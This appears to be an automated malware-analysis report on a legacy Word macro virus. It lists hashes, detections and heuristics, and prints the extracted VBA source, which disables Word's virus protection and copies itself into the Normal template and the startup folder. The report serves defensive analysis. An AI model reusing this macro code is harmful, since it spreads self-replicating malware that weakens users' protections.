Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 7c696fb40819ae1d…

MALICIOUS

Office (OLE)

36.5 KB Created: 1998-11-06 07:51:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: a93f98ffb650b6919e2ddb13e31b948a SHA-1: 01b83ddf5a45132e18526164f49af385bc1e855f SHA-256: 7c696fb40819ae1de8d5dd075dce5c59915e85829aade24efbd3f3ca375f5988
262 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains legacy WordBasic macro virus markers and VBA macros, including AutoOpen and Auto_Close functions, indicating a malicious intent to execute code upon opening. The embedded VBA script attempts to disable virus protection and manipulate macro settings, suggesting it is designed to download and execute a secondary payload. The presence of multiple embedded URLs, some of which are unknown or benign, further supports the downloader hypothesis.

Heuristics 6

  • ClamAV: Doc.Trojan.Class-36 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Class-36
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.Microso In document text (OLE body)
    • http://www.cannabisculture.com�In document text (OLE body)
    • http://www.Microsoft.com�In document text (OLE body)
    • http://www.cannabisculture.comIn document text (OLE body)
    • http://www.Microsoft.comIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 23636 bytes
SHA-256: e2f4b7af13b2d5497211f1cbae86f395557dc687107b4b6efb55426d22f091b1
Detection
ClamAV: Doc.Trojan.Class-29
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
'81376636814662431524813766368146624315248137663681466243152481376636814662431524
Randomize
'13795058788950044821849137950587889500448218491379505878895004482184913795058788950044821849
x = 0: o = 0
'1113316648962304576036111331664896230457603611133166489623045760361113316648962304576036
On Error GoTo 93
'1116044344947024789904111604434494702478990411160443449470247899041116044344947024789904
Options.VirusProtection = False
'478199910423045061636478199910423045061636478199910423045061636478199910423045061636
Options.SaveNormalPrompt = False
'952024854012117472256952024854012117472256952024854012117472256952024854012117472256
Options.ConfirmConversions = False
'992892673651208974436992892673651208974436992892673651208974436992892673651208974436
fx = ActiveDocument.VBProject.VBComponents.Item(1).codemodule.CountOfLines
'3154353602516682047281315435360251668204728131543536025166820472813154353602516682047281
xf = NormalTemplate.VBProject.VBComponents.Item(1).codemodule.CountOfLines
'1456680024929181180625145668002492918118062514566800249291811806251456680024929181180625
If xf > 96 And fx > 0 Then GoTo 93
'6512959202532271607449651295920253227160744965129592025322716074496512959202532271607449
If xf < 96 Then
'4685363284921777790329468536328492177779032946853632849217777903294685363284921777790329
    Set xs = NormalTemplate.VBProject.VBComponents.Item(1)
'1884662208923522663641188466220892352266364118846622089235226636411884662208923522663641
    ActiveDocument.VBProject.VBComponents.Item(1).Name = xs.Name
'107439728420437561600107439728420437561600107439728420437561600107439728420437561600
    ActiveDocument.VBProject.VBComponents.Item(1).Export Application.StartupPath & Chr(83) + Chr(69) + Chr(69) + Chr(68) + Chr(73) + Chr(73)
'1042230828965712336400104223082896571233640010422308289657123364001042230828965712336400
End If
'50717186563576040000507171865635760400005071718656357604000050717186563576040000
If fx = 0 Then Set xs = ActiveDocument.VBProject.VBComponents.Item(1)
'1550896622526391951936155089662252639195193615508966225263919519361550896622526391951936
k = Int(Rnd(1) * 100) + 1
'6561026102510869730564656102610251086973056465610261025108697305646561026102510869730564
If k = 99 Then ActiveWindow.WindowState = wdWindowStateMinimize: ActiveDocument.FollowHyperlink Address:="http://www.cannabisculture.com", NewWindow:=False, AddHistory:=False, ExtraInfo:=Chr(67) + Chr(76) + Chr(65) + Chr(83) + Chr(83) + Chr(47) + Chr(83) + Chr(69) + Chr(69) + Chr(68) + Chr(73) + Chr(73)
'154313537293393878049154313537293393878049154313537293393878049154313537293393878049
l = Int(Rnd(1) * 75) + 1
'478795665962752261444478795665962752261444478795665962752261444478795665962752261444
If l = 74 Then ActiveWindow.WindowState = wdWindowStateMinimize: ActiveDocument.FollowHyperlink Address:="http://www.Microsoft.com", NewWindow:=False, AddHistory:=False, ExtraInfo:=Chr(67) + Chr(76) + Chr(65) + Chr(83) + Chr(83) + Chr(47) + Chr(83) + Chr(69) + Chr(69) + Chr(68) + Chr(73) + Chr(73)
'81527380900335878929815273809003358789298152738090033587892981527380900335878929
m = Int(Rnd(1) * 50) + 1
'746133164151586674129746133164151586674129746133164151586674129746133164151586674129
If m = 49 Then MsgBox Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(80) + Chr(82) + Chr(79) + Chr(32) + Chr(86) + Chr(105) + Chr(82) + Chr(117) + Chr(83)
'35129255184799984656351292551847999846563512925518479998465635129255184799984656
n = Int(Rnd(1) * 25) + 1
'The GeniusTrueFalse8.0.5622c:\program files\microsoft office\office\startupBooklist.doc8.0b
If n = 24 Then MsgBox Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(32) + Chr(67) + Chr(76) + Chr(65) + Chr(83) + Chr(83) + Chr(32) + Chr(83) + Chr(69) + Chr(69) + Chr(68) + Chr(32) + Chr(73) + Chr(73)

... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.